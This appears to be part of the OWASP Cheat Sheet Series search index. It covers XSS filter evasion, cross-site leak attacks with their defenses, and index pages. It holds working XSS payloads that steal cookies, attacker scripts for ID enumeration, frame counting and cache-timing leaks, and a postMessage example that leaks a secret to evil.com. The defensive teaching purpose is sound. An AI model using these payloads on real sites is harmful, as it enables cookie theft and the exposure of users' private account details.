In this case, if the attacker sets the untrusted content title to \"This is a regular title&content_type=1;alert(1)\", the link in the \"Content\" page would be this:

<a href=\"/share?content_type=1&title=This is a regular title&amp;content_type=1;alert(1)\">Share</a>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#share-page-output","title":"Share Page Output","text":"

And the \"Share\" page output could be this:

<script>\nvar contentType = 1; alert(1);\nvar title = \"This is a regular title\";\n\u2026\n//some user agreement and sending to server logic might be here\n\u2026\n</script>\n

As a result, in this example the main flaw is trusting the content_type in the \"Share\" page without proper encoding or validation. HTTP Parameter Pollution could increase the impact of the XSS flaw by promoting it from a reflected XSS to a stored XSS.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#character-escape-sequences","title":"Character Escape Sequences","text":"

These are all the possible escape combinations for the character \"\\<\" in HTML and JavaScript. Most of these won't render out of the box, but many of them can get rendered in certain circumstances, as seen above.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#methods-to-bypass-waf-cross-site-scripting","title":"Methods to Bypass WAF \u2013 Cross-Site Scripting","text":""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#general-issues","title":"General issues","text":""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#stored-xss","title":"Stored XSS","text":"

If an attacker manages to push XSS through the filter, the WAF won't be able to prevent the attack.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#reflected-xss-in-javascript","title":"Reflected XSS in JavaScript","text":"
Example: <script> ... setTimeout(\\\\\"writetitle()\\\\\",$\\_GET\\[xss\\]) ... </script>\nExploitation:\u00a0/?xss=500);\u00a0alert(document.cookie);//\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#dom-based-xss","title":"DOM-based XSS","text":"
Example:\u00a0<script> ... eval($\\_GET\\[xss\\]); ... </script>\nExploitation:\u00a0/?xss=document.cookie\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#xss-via-request-redirection","title":"XSS via request Redirection","text":"
...\nheader('Location:\u00a0'.$_GET['param']);\n...\n

As well as:

..\nheader('Refresh:\u00a00;\u00a0URL='.$_GET['param']); \n...\n

/?param=<javascript:alert(document.cookie>)

/?param=<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#waf-bypass-strings-for-xss","title":"WAF ByPass Strings for XSS","text":""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#filter-bypass-alert-obfuscation","title":"Filter Bypass Alert Obfuscation","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html","title":"Cross-site leaks Cheat Sheet","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article describes examples of attacks and defenses against the cross-site leaks vulnerability (XS Leaks). Since this vulnerability is based on the core mechanisms of modern web browsers, it's also called a browser side-channel attack. XS-Leaks attacks seek to exploit seemingly insignificant information that is exchanged in cross-site communications between sites. From this information, answers can be inferred to questions about the victim's user account, for example whether the victim is currently logged in or has an account on a particular site.

On the basis of such questions, the attacker might try to deduce the answers, depending on the application's context. In most cases, the answers will be in binary form (yes or no). The impact of this vulnerability depends strongly on the application's risk profile. Despite this, XS Leaks may pose a real threat to user privacy and anonymity.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#attack-vector","title":"Attack vector","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#same-origin-policy-sop","title":"Same Origin Policy (SOP)","text":"

Before describing attacks, it's good to understand one of the most critical security mechanisms in browsers - the Same-Origin Policy. A few key aspects: an origin is the combination of a URL's scheme, host, and port, and by default a script from one origin cannot read responses fetched from a different origin. For example:

Origin A | Origin B | Same origin?\nhttps://example.com | http://sub.example.com | No, different hosts\nhttps://example.com | https://example.com:443 | Yes! Implicit port in Origin A

Although the SOP principle protects us from accessing information in cross-origin communication, XS-Leaks attacks based on residual data can infer some information.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#samesite-cookies","title":"SameSite Cookies","text":"

The SameSite attribute of a cookie tells the browser whether it should include the cookie in a request coming from another site. The SameSite attribute takes the values None, Lax, and Strict.

It is worth mentioning that Chromium-based browsers treat cookies without a SameSite attribute as Lax by default.

SameSite cookies are a strong defense-in-depth mechanism against some classes of XS Leaks and CSRF attacks, which can significantly reduce the attack surface, but may not completely eliminate them (see, e.g., window-based XS Leak attacks like frame counting and navigation).
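
As an illustration, a session cookie can be issued with an explicit SameSite value instead of relying on browser defaults (the cookie name and value below are placeholders):

Set-Cookie: sessionid=<value>; Secure; HttpOnly; SameSite=Lax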

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#how-do-we-know-that-two-sites-are-samesite","title":"How do we know that two sites are SameSite?","text":"

In the context of the SameSite attribute, we consider the site to be the combination of the TLD (top-level domain) and the domain name before it. For example:

Full URL | Site (eTLD+1)\nhttps://example.com:443/data?query=test | example.com

Why are we talking about eTLD+1 and not just TLD+1? It's because of domains like .github.io or .eu.org. Such suffixes are not granular enough to be compared meaningfully. For this reason, a list of \"effective\" TLDs (eTLDs) was created and can be found here.

Sites that have the same eTLD+1 are considered SameSite, examples:

Origin A | Origin B | SameSite?\nhttps://example.com | http://example.com | Yes, schemes don't matter\nhttps://evil.net | https://example.com | No, different eTLD+1\nhttps://sub.example.com | https://data.example.com | Yes, subdomains don't matter

For more information about SameSite, see the excellent article Understanding \"same-site\".

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#attacks-using-the-element-id-attribute","title":"Attacks using the element ID attribute","text":"

Elements in the DOM can have an ID attribute that is unique within the document. For example:

<button id=\"pro\">Pro account</button>\n

The browser will automatically focus on an element with a given ID if we append a hash to the URL, e.g. https://example.com#pro. What's more, the JavaScript focus event gets fired. The attacker may try to embed the application in an iframe with a specific source on a page they control,

and then add a listener in the main document for the blur event (the opposite of focus). When the victim visits the attacker's site, the blur event gets fired, and the attacker will be able to conclude that the victim has a pro account.
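
A minimal sketch of what such an attacker-controlled page might run, assuming the probed application is https://example.com and the probed element ID is pro (both taken from the example above):

// Attacker-controlled page: embed the victim application with a fragment pointing at the probed ID\nconst frame = document.createElement('iframe');\nframe.src = 'https://example.com#pro';\ndocument.body.appendChild(frame);\n\n// If the framed page focuses the element with id \"pro\", the top document loses focus and blur fires\nwindow.addEventListener('blur', () => {\n  console.log('#pro exists - the victim likely has a pro account');\n});\n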

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#defense","title":"Defense","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#framing-protection","title":"Framing protection","text":"

If you don't need other origins to embed your application in a frame, consider using one of two mechanisms: the Content-Security-Policy frame-ancestors directive or the X-Frame-Options header.

Setting up framing protection effectively blocks the ability to embed your application in a frame on an attacker-controlled origin and protects against other attacks like Clickjacking.
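
For instance, a response that should never be framed could send either of these headers (frame-ancestors is the modern mechanism, X-Frame-Options the legacy one):

Content-Security-Policy: frame-ancestors 'none'\nX-Frame-Options: DENY\n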

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#fetch-metadata-sec-fetch-dest","title":"Fetch metadata (Sec-Fetch-Dest)","text":"

The Sec-Fetch-Dest header tells us what the end goal of the request is. This header is included automatically by the browser and is one of the headers within the Fetch Metadata standard.

With Sec-Fetch-Dest you can build your own effective resource isolation policies, for example:

app.get('/', (req, res) => {\n  if (req.get('Sec-Fetch-Dest') === 'iframe') {\n    return res.sendStatus(403);\n  }\n  res.send({\n    message: 'Hello!'\n  });\n});\n

If you want to use headers from the Fetch Metadata standard, make sure that your users' browsers support this standard (you can check it here). Also, think about using an appropriate fallback in code if the Sec-Fetch-* header is not included in the request; a sketch of one possible fallback follows.
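
A minimal sketch of such a fallback, building on the Express-style handler above; treating a missing Sec-Fetch-Dest as a legacy browser and falling back to a different signal (here a simple Referer check against our own origin, purely for illustration) is one possible policy:

app.get('/', (req, res) => {\n  const dest = req.get('Sec-Fetch-Dest');\n  if (dest === undefined) {\n    // Legacy browser without Fetch Metadata: fall back to a weaker, illustrative check\n    const referer = req.get('Referer') || '';\n    if (!referer.startsWith('https://example.com/')) {\n      return res.sendStatus(403);\n    }\n  } else if (dest === 'iframe') {\n    return res.sendStatus(403);\n  }\n  res.send({ message: 'Hello!' });\n});\n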

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#attacks-based-on-error-events","title":"Attacks based on error events","text":"

Embedding resources from other origins is generally allowed. For example, you can embed an image from another origin, or even a script, on your page. What is not permitted is reading a cross-origin resource, due to the SOP.

When the browser sends a request for a resource, the server processes the request and decides on the response (e.g. 200 OK or 404 NOT FOUND). The browser receives the HTTP response and, based on that, the appropriate JavaScript event is fired (onload or onerror).

In this way, we can try to load resources and, based on the response status, infer whether they exist or not in the context of the logged-in victim. Let's look at the following situation:

Given the above example, an attacker can use JavaScript on an origin they control to guess the victim's ID by enumerating over all possible values in a simple loop.

function checkId(id) {\n  const script = document.createElement('script');\n  script.src = `https://example.com/api/users/${id}`;\n  script.onload = () => {\n    console.log(`Logged user id: ${id}`);\n  };\n  document.body.appendChild(script);\n}\n\n// Generate array [0, 1, ..., 40]\nconst ids = Array(41)\n  .fill()\n  .map((_, i) => i + 0);\n\nfor (const id of ids) {\n  checkId(id);\n}\n

Note that the attacker here does not care about reading the response body, even though it would not be able to due to solid isolation mechanisms in browsers such as Cross-Origin Resource Blocking. All it needs is the success signal it receives when the onload event fires.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#defense_1","title":"Defense","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#subresource-protection","title":"SubResource protection","text":"

In some cases, a mechanism of special unique tokens may be implemented to protect sensitive endpoints.

/api/users/1234?token=be930b8cfb5011eb9a030242ac130003

Although this solution is quite effective, implementing it properly generates significant overhead.
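A minimal sketch of the idea in an Express application (the login route, the subresourceToken property and the use of express-session or an equivalent session mechanism are assumptions; any unguessable, per-user value will do):

const crypto = require('crypto');

app.post('/login', (req, res) => {
  // ... authenticate the user, then bind a random token to the session
  req.session.subresourceToken = crypto.randomBytes(16).toString('hex');
  res.sendStatus(204);
});

app.get('/api/users/:id', (req, res) => {
  // Reject requests that do not carry the expected token
  if (!req.session || req.query.token !== req.session.subresourceToken) {
    return res.sendStatus(403);
  }
  res.send({ id: req.params.id });
});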

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#fetch-metadata-sec-fetch-site","title":"Fetch metadata (Sec-Fetch-Site)","text":"

This header specifies where the request was sent from, and it takes the following values:

Like Sec-Fetch-Dest, this header is automatically appended by the browser to each request and is part of the Fetch Metadata standard. Example usage:

app.get('/api/users/:id', authorization, (req, res) => {
  if (req.get('Sec-Fetch-Site') === 'cross-site') {
    return res.sendStatus(403);
  }

  // ... more code

  return res.send({ id: 1234, name: 'John', role: 'admin' });
});
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#cross-origin-resource-policy-corp","title":"Cross-Origin-Resource-Policy (CORP)","text":"

If the server returns this header with the appropriate value, the browser will not allow other applications to load resources (even static images) from our site or origin. Possible values:

Read more about CORP here.
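A minimal sketch of returning this header from an Express application (same-origin is only one of the possible values mentioned above):

// Only documents from the same origin may load our resources
app.use((req, res, next) => {
  res.setHeader('Cross-Origin-Resource-Policy', 'same-origin');
  next();
});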

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#attacks-on-postmessage-communication","title":"Attacks on postMessage communication","text":"

Sometimes, in controlled situations, we would like to exchange information between different origins despite the SOP. We can use the postMessage mechanism. See the example below:

// Origin: http://example.com
const site = new URLSearchParams(window.location.search).get('site'); // https://evil.com
const popup = window.open(site);
popup.postMessage('secret message!', '*');

// Origin: https://evil.com
window.addEventListener('message', e => {
  alert(e.data); // secret message! - leak
});
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#defense_2","title":"Defense","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#specify-strict-targetorigin","title":"Specify strict targetOrigin","text":"

To avoid situations like the one above, where an attacker manages to obtain a reference to a window in order to receive a message, always specify the exact targetOrigin in postMessage. Passing the wildcard * as the targetOrigin allows any origin to receive the message.

// Origin: http://example.com
const site = new URLSearchParams(window.location.search).get('site'); // https://evil.com
const popup = window.open(site);
popup.postMessage('secret message!', 'https://sub.example.com');

// Origin: https://evil.com
window.addEventListener('message', e => {
  alert(e.data); // no data!
});
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#frame-counting-attacks","title":"Frame counting attacks","text":"

Information about the number of loaded frames in a window can be a source of leakage. Take, for example, an application that loads search results into a frame; if the results are empty, the frame does not appear.

An attacker can get information about the number of loaded frames in a window by counting the frames in the window.frames object.

So, finally, an attacker can obtain an email list and, in a simple loop, open subsequent windows and count the number of frames. If the number of frames in an opened window is equal to 1, the email is in the database of the application used by the victim.
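As an illustration, a minimal sketch of such an attacker loop (the search URL mirrors the one used in the COOP example below; the probeEmail helper and the fixed delay are hypothetical):

// Attacker page (sketch): probe whether an email exists in the victim's application
function probeEmail(email) {
  const url = `https://example.com/admin/customers?search=${encodeURIComponent(email)}`;
  const win = window.open(url);
  setTimeout(() => {
    // One frame means the search returned a result; zero means it did not
    console.log(email, win.frames.length === 1 ? 'exists' : 'does not exist');
  }, 2000);
}

for (const email of ['john@example.com', 'jane@example.com']) {
  probeEmail(email);
}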

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#defense_3","title":"Defense","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#cross-origin-opener-policy-coop","title":"Cross-Origin-Opener-Policy (COOP)","text":"

Setting this header will prevent cross-origin documents from opening in the same browsing context group. This ensures that a document opening another document will not have access to its window object. Possible values:

If the server returns, for example, the COOP header with the value same-origin, the attack fails:

const win = window.open('https://example.com/admin/customers?search=john%40example.com');
console.log(win.frames.length); // Cannot read property 'length' of null
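On the server side, a minimal sketch of setting this header in an Express application (same-origin is only one of the possible values mentioned above):

// Isolate our documents in their own browsing context group
app.use((req, res, next) => {
  res.setHeader('Cross-Origin-Opener-Policy', 'same-origin');
  next();
});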
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#attacks-using-browser-cache","title":"Attacks using browser cache","text":"

The browser cache helps to significantly reduce the time it takes for a page to load when revisited. However, it can also pose a risk of information leakage. If an attacker is able to detect, from the load time, whether a resource was loaded from the cache, they can draw conclusions based on it.

The principle is simple: a resource loaded from the cache loads incomparably faster than one fetched from the server.

An attacker can embed on their site a resource that is only accessible to a user with the admin role. Then, using JavaScript, they can read the load time of that particular resource and, based on this information, deduce whether the resource is in the cache or not.

// Threshold above which we consider a resource to have loaded from the server
// const THRESHOLD = ...

const adminImagePerfEntry = window.performance
  .getEntries()
  .find((entry) => entry.name.endsWith('admin.svg'));

if (adminImagePerfEntry && adminImagePerfEntry.duration < THRESHOLD) {
  console.log('Image loaded from cache!');
}
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#defense_4","title":"Defense","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#unpredictable-tokens-for-images","title":"Unpredictable tokens for images","text":"

This technique is appropriate when you want the resources to remain cacheable for the user while preventing an attacker from finding out whether they are cached.

/avatars/admin.svg?token=be930b8cfb5011eb9a030242ac130003
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#using-the-cache-control-header","title":"Using the Cache-Control header","text":"

You can disable the cache mechanism if you accept the degraded performance related to the necessity of reloading resources from the server every time a user visits the site. To disable caching for resources you want to protect, set the response header Cache-Control: no-store.
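A minimal sketch for an Express application (the /avatars path reuses the example above and is purely illustrative):

// Disable caching for resources that must not be probed via cache timing
app.use('/avatars', (req, res, next) => {
  res.setHeader('Cache-Control', 'no-store');
  next();
});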

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#quick-recommendations","title":"Quick recommendations","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#xs-leaks","title":"XS Leaks","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#fetch-metadata","title":"Fetch Metadata","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#framing-protection_1","title":"Framing protection","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#samesite","title":"SameSite","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#coop-and-corp-header","title":"COOP and CORP header","text":""}]} \ No newline at end of file +{"config":{"lang":["en"],"separator":"[\\s\\-]+","pipeline":["stopWordFilter"]},"docs":[{"location":"index.html","title":"Introduction","text":"

The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics. These cheat sheets were created by various application security professionals who have expertise in specific topics.

We hope that this project provides you with excellent security guidance in an easy to read format.

You can download this site here.

An ATOM feed is available here with the latest updates.

Project leaders:

Core team:

Project links:

"},{"location":"Glossary.html","title":"Index Alphabetical","text":"

85 cheat sheets available.

Icons beside the cheat sheet name indicate in which language(s) code snippet(s) are provided.

A B C D E F G H I J K L M N O P Q R S T U V W X

"},{"location":"Glossary.html#a","title":"A","text":"

Authentication Cheat Sheet.

Authorization Cheat Sheet.

AJAX Security Cheat Sheet.

Attack Surface Analysis Cheat Sheet.

Access Control Cheat Sheet.

Authorization Testing Automation Cheat Sheet.

Abuse Case Cheat Sheet.

"},{"location":"Glossary.html#b","title":"B","text":"

Bean Validation Cheat Sheet.

"},{"location":"Glossary.html#c","title":"C","text":"

Credential Stuffing Prevention Cheat Sheet.

Cryptographic Storage Cheat Sheet.

Content Security Policy Cheat Sheet.

Choosing and Using Security Questions Cheat Sheet.

Cross-Site Request Forgery Prevention Cheat Sheet.

Cross Site Scripting Prevention Cheat Sheet.

C-Based Toolchain Hardening Cheat Sheet.

Clickjacking Defense Cheat Sheet.

"},{"location":"Glossary.html#d","title":"D","text":"

Denial of Service Cheat Sheet.

DOM based XSS Prevention Cheat Sheet.

Django REST Framework Cheat Sheet.

DOM Clobbering Prevention Cheat Sheet.

Deserialization Cheat Sheet.

Docker Security Cheat Sheet.

Database Security Cheat Sheet.

DotNet Security Cheat Sheet.

"},{"location":"Glossary.html#e","title":"E","text":"

Error Handling Cheat Sheet.

"},{"location":"Glossary.html#f","title":"F","text":"

File Upload Cheat Sheet.

Forgot Password Cheat Sheet.

"},{"location":"Glossary.html#g","title":"G","text":"

GraphQL Cheat Sheet.

"},{"location":"Glossary.html#h","title":"H","text":"

HTTP Headers Cheat Sheet.

HTML5 Security Cheat Sheet.

HTTP Strict Transport Security Cheat Sheet.

"},{"location":"Glossary.html#i","title":"I","text":"

Insecure Direct Object Reference Prevention Cheat Sheet.

Infrastructure as Code Security Cheat Sheet.

Input Validation Cheat Sheet.

Injection Prevention Cheat Sheet.

Injection Prevention in Java Cheat Sheet.

"},{"location":"Glossary.html#j","title":"J","text":"

JAAS Cheat Sheet.

Java Security Cheat Sheet.

JSON Web Token for Java Cheat Sheet.

"},{"location":"Glossary.html#k","title":"K","text":"

Kubernetes Security Cheat Sheet.

Key Management Cheat Sheet.

"},{"location":"Glossary.html#l","title":"L","text":"

Logging Vocabulary Cheat Sheet.

Laravel Cheat Sheet.

Logging Cheat Sheet.

LDAP Injection Prevention Cheat Sheet.

"},{"location":"Glossary.html#m","title":"M","text":"

Microservices Security Cheat Sheet.

Mass Assignment Cheat Sheet.

Microservices based Security Arch Doc Cheat Sheet.

Multifactor Authentication Cheat Sheet.

"},{"location":"Glossary.html#n","title":"N","text":"

Nodejs Security Cheat Sheet.

NodeJS Docker Cheat Sheet.

NPM Security Cheat Sheet.

Network Segmentation Cheat Sheet.

"},{"location":"Glossary.html#o","title":"O","text":"

OS Command Injection Defense Cheat Sheet.

"},{"location":"Glossary.html#p","title":"P","text":"

Pinning Cheat Sheet.

Prototype Pollution Prevention Cheat Sheet.

PHP Configuration Cheat Sheet.

Password Storage Cheat Sheet.

"},{"location":"Glossary.html#q","title":"Q","text":"

Query Parameterization Cheat Sheet.

"},{"location":"Glossary.html#r","title":"R","text":"

Ruby on Rails Cheat Sheet.

REST Assessment Cheat Sheet.

REST Security Cheat Sheet.

"},{"location":"Glossary.html#s","title":"S","text":"

SAML Security Cheat Sheet.

Secrets Management Cheat Sheet.

Session Management Cheat Sheet.

Securing Cascading Style Sheets Cheat Sheet.

SQL Injection Prevention Cheat Sheet.

Secure Cloud Architecture Cheat Sheet.

Server Side Request Forgery Prevention Cheat Sheet.

Secure Product Design Cheat Sheet.

"},{"location":"Glossary.html#t","title":"T","text":"

Transaction Authorization Cheat Sheet.

Transport Layer Protection Cheat Sheet.

TLS Cipher String Cheat Sheet.

Third Party Javascript Management Cheat Sheet.

Threat Modeling Cheat Sheet.

"},{"location":"Glossary.html#u","title":"U","text":"

User Privacy Protection Cheat Sheet.

Unvalidated Redirects and Forwards Cheat Sheet.

"},{"location":"Glossary.html#v","title":"V","text":"

Virtual Patching Cheat Sheet.

Vulnerable Dependency Management Cheat Sheet.

Vulnerability Disclosure Cheat Sheet.

"},{"location":"Glossary.html#w","title":"W","text":"

Web Service Security Cheat Sheet.

"},{"location":"Glossary.html#x","title":"X","text":"

XSS Filter Evasion Cheat Sheet.

XS Leaks Cheat Sheet.

XML External Entity Prevention Cheat Sheet.

XML Security Cheat Sheet.

"},{"location":"IndexASVS.html","title":"ASVS Index","text":""},{"location":"IndexASVS.html#table-of-contents","title":"Table of Contents","text":""},{"location":"IndexASVS.html#objective","title":"Objective","text":"

The objective of this index is to help an OWASP Application Security Verification Standard (ASVS) user clearly identify which cheat sheets are useful for each section during his or her usage of the ASVS.

This index is based on version 4.x of the ASVS.

"},{"location":"IndexASVS.html#v1-architecture-design-and-threat-modeling-requirements","title":"V1: Architecture, Design and Threat Modeling Requirements","text":""},{"location":"IndexASVS.html#v11-secure-software-development-lifecycle-requirements","title":"V1.1 Secure Software Development Lifecycle Requirements","text":"

Threat Modeling Cheat Sheet.

Abuse Case Cheat Sheet.

Attack Surface Analysis Cheat Sheet.

"},{"location":"IndexASVS.html#v12-authentication-architectural-requirements","title":"V1.2 Authentication Architectural Requirements","text":"

None.

"},{"location":"IndexASVS.html#v13-session-management-architectural-requirements","title":"V1.3 Session Management Architectural Requirements","text":"

None.

"},{"location":"IndexASVS.html#v14-access-control-architectural-requirements","title":"V1.4 Access Control Architectural Requirements","text":"

Docker Security Cheat Sheet.

"},{"location":"IndexASVS.html#v15-input-and-output-architectural-requirements","title":"V1.5 Input and Output Architectural Requirements","text":"

Abuse Case Cheat Sheet.

Deserialization Cheat Sheet.

"},{"location":"IndexASVS.html#v16-cryptographic-architectural-requirements","title":"V1.6 Cryptographic Architectural Requirements","text":"

Cryptographic Storage Cheat Sheet.

Key Management Cheat Sheet.

"},{"location":"IndexASVS.html#v17-errors-logging-and-auditing-architectural-requirements","title":"V1.7 Errors, Logging and Auditing Architectural Requirements","text":"

Logging Cheat Sheet.

"},{"location":"IndexASVS.html#v18-data-protection-and-privacy-architectural-requirements","title":"V1.8 Data Protection and Privacy Architectural Requirements","text":"

Abuse Case Cheat Sheet.

User Privacy Protection Cheat Sheet.

"},{"location":"IndexASVS.html#v19-communications-architectural-requirements","title":"V1.9 Communications Architectural Requirements","text":"

Transport Layer Protection Cheat Sheet.

TLS Cipher String Cheat Sheet.

"},{"location":"IndexASVS.html#v110-malicious-software-architectural-requirements","title":"V1.10 Malicious Software Architectural Requirements","text":"

Third Party Javascript Management Cheat Sheet.

Virtual Patching Cheat Sheet.

"},{"location":"IndexASVS.html#v111-business-logic-architectural-requirements","title":"V1.11 Business Logic Architectural Requirements","text":"

Abuse Case Cheat Sheet.

"},{"location":"IndexASVS.html#v112-secure-file-upload-architectural-requirements","title":"V1.12 Secure File Upload Architectural Requirements","text":"

None.

"},{"location":"IndexASVS.html#v113-api-architectural-requirements","title":"V1.13 API Architectural Requirements","text":"

REST Security Cheat Sheet.

"},{"location":"IndexASVS.html#v114-configuration-architectural-requirements","title":"V1.14 Configuration Architectural Requirements","text":"

None.

"},{"location":"IndexASVS.html#v2-authentication-verification-requirements","title":"V2: Authentication Verification Requirements","text":""},{"location":"IndexASVS.html#v21-password-security-requirements","title":"V2.1 Password Security Requirements","text":"

Choosing and Using Security Questions Cheat Sheet.

Forgot Password Cheat Sheet.

Credential Stuffing Prevention Cheat Sheet

"},{"location":"IndexASVS.html#v22-general-authenticator-requirements","title":"V2.2 General Authenticator Requirements","text":"

Authentication Cheat Sheet.

Transport Layer Protection Cheat Sheet.

TLS Cipher String Cheat Sheet.

"},{"location":"IndexASVS.html#v23-authenticator-lifecycle-requirements","title":"V2.3 Authenticator Lifecycle Requirements","text":"

None.

"},{"location":"IndexASVS.html#v24-credential-storage-requirements","title":"V2.4 Credential Storage Requirements","text":"

Password Storage Cheat Sheet.

"},{"location":"IndexASVS.html#v25-credential-recovery-requirements","title":"V2.5 Credential Recovery Requirements","text":"

Choosing and Using Security Questions Cheat Sheet.

Forgot Password Cheat Sheet.

"},{"location":"IndexASVS.html#v26-look-up-secret-verifier-requirements","title":"V2.6 Look-up Secret Verifier Requirements","text":"

None.

"},{"location":"IndexASVS.html#v27-out-of-band-verifier-requirements","title":"V2.7 Out of Band Verifier Requirements","text":"

Forgot Password Cheat Sheet.

"},{"location":"IndexASVS.html#v28-single-or-multi-factor-one-time-verifier-requirements","title":"V2.8 Single or Multi Factor One Time Verifier Requirements","text":"

None.

"},{"location":"IndexASVS.html#v29-cryptographic-software-and-devices-verifier-requirements","title":"V2.9 Cryptographic Software and Devices Verifier Requirements","text":"

Cryptographic Storage Cheat Sheet.

Key Management Cheat Sheet.

"},{"location":"IndexASVS.html#v210-service-authentication-requirements","title":"V2.10 Service Authentication Requirements","text":"

None.

"},{"location":"IndexASVS.html#v3-session-management-verification-requirements","title":"V3: Session Management Verification Requirements","text":""},{"location":"IndexASVS.html#v31-fundamental-session-management-requirements","title":"V3.1 Fundamental Session Management Requirements","text":"

None.

"},{"location":"IndexASVS.html#v32-session-binding-requirements","title":"V3.2 Session Binding Requirements","text":"

Session Management Cheat Sheet.

"},{"location":"IndexASVS.html#v33-session-logout-and-timeout-requirements","title":"V3.3 Session Logout and Timeout Requirements","text":"

Session Management Cheat Sheet.

"},{"location":"IndexASVS.html#v34-cookie-based-session-management","title":"V3.4 Cookie-based Session Management","text":"

Session Management Cheat Sheet.

Cross-Site Request Forgery Prevention Cheat Sheet.

"},{"location":"IndexASVS.html#v35-token-based-session-management","title":"V3.5 Token-based Session Management","text":"

JSON Web Token Cheat Sheet for Java.

REST Security Cheat Sheet.

"},{"location":"IndexASVS.html#v36-re-authentication-from-a-federation-or-assertion","title":"V3.6 Re-authentication from a Federation or Assertion","text":"

None.

"},{"location":"IndexASVS.html#v37-defenses-against-session-management-exploits","title":"V3.7 Defenses Against Session Management Exploits","text":"

Session Management Cheat Sheet.

Transaction Authorization Cheat Sheet.

"},{"location":"IndexASVS.html#v4-access-control-verification-requirements","title":"V4: Access Control Verification Requirements","text":""},{"location":"IndexASVS.html#v41-general-access-control-design","title":"V4.1 General Access Control Design","text":"

Access Control Cheat Sheet.

Authorization Testing Automation.

"},{"location":"IndexASVS.html#v42-operation-level-access-control","title":"V4.2 Operation Level Access Control","text":"

Insecure Direct Object Reference Prevention Cheat Sheet.

Cross-Site Request Forgery Prevention Cheat Sheet.

Authorization Testing Automation.

"},{"location":"IndexASVS.html#v43-other-access-control-considerations","title":"V4.3 Other Access Control Considerations","text":"

REST Assessment Cheat Sheet.

"},{"location":"IndexASVS.html#v5-validation-sanitization-and-encoding-verification-requirements","title":"V5: Validation, Sanitization and Encoding Verification Requirements","text":""},{"location":"IndexASVS.html#v51-input-validation-requirements","title":"V5.1 Input Validation Requirements","text":"

Mass Assignment Cheat Sheet.

Input Validation Cheat Sheet.

"},{"location":"IndexASVS.html#v52-sanitization-and-sandboxing-requirements","title":"V5.2 Sanitization and Sandboxing Requirements","text":"

Server Side Request Forgery Prevention Cheat Sheet.

XSS Prevention Cheat Sheet.

DOM based XSS Prevention Cheat Sheet.

Unvalidated Redirects and Forwards Cheat Sheet.

"},{"location":"IndexASVS.html#v53-output-encoding-and-injection-prevention-requirements","title":"V5.3 Output encoding and Injection Prevention Requirements","text":"

XSS Prevention Cheat Sheet.

DOM based XSS Prevention Cheat Sheet.

HTML5 Security Cheat Sheet.

Injection Prevention Cheat Sheet.

Injection Prevention Cheat Sheet in Java.

Input Validation Cheat Sheet.

LDAP Injection Prevention Cheat Sheet.

OS Command Injection Defense Cheat Sheet.

Protect File Upload Against Malicious File.

Query Parameterization Cheat Sheet.

SQL Injection Prevention Cheat Sheet.

Unvalidated Redirects and Forwards Cheat Sheet.

Bean Validation Cheat Sheet.

XXE Prevention Cheat Sheet.

XML Security Cheat Sheet.

"},{"location":"IndexASVS.html#v54-memory-string-and-unmanaged-code-requirements","title":"V5.4 Memory, String, and Unmanaged Code Requirements","text":"

None.

"},{"location":"IndexASVS.html#v55-deserialization-prevention-requirements","title":"V5.5 Deserialization Prevention Requirements","text":"

Deserialization Cheat Sheet.

XXE Prevention Cheat Sheet.

XML Security Cheat Sheet.

"},{"location":"IndexASVS.html#v6-stored-cryptography-verification-requirements","title":"V6: Stored Cryptography Verification Requirements","text":""},{"location":"IndexASVS.html#v61-data-classification","title":"V6.1 Data Classification","text":"

Abuse Case Cheat Sheet.

User Privacy Protection Cheat Sheet.

"},{"location":"IndexASVS.html#v62-algorithms","title":"V6.2 Algorithms","text":"

Cryptographic Storage Cheat Sheet.

Key Management Cheat Sheet.

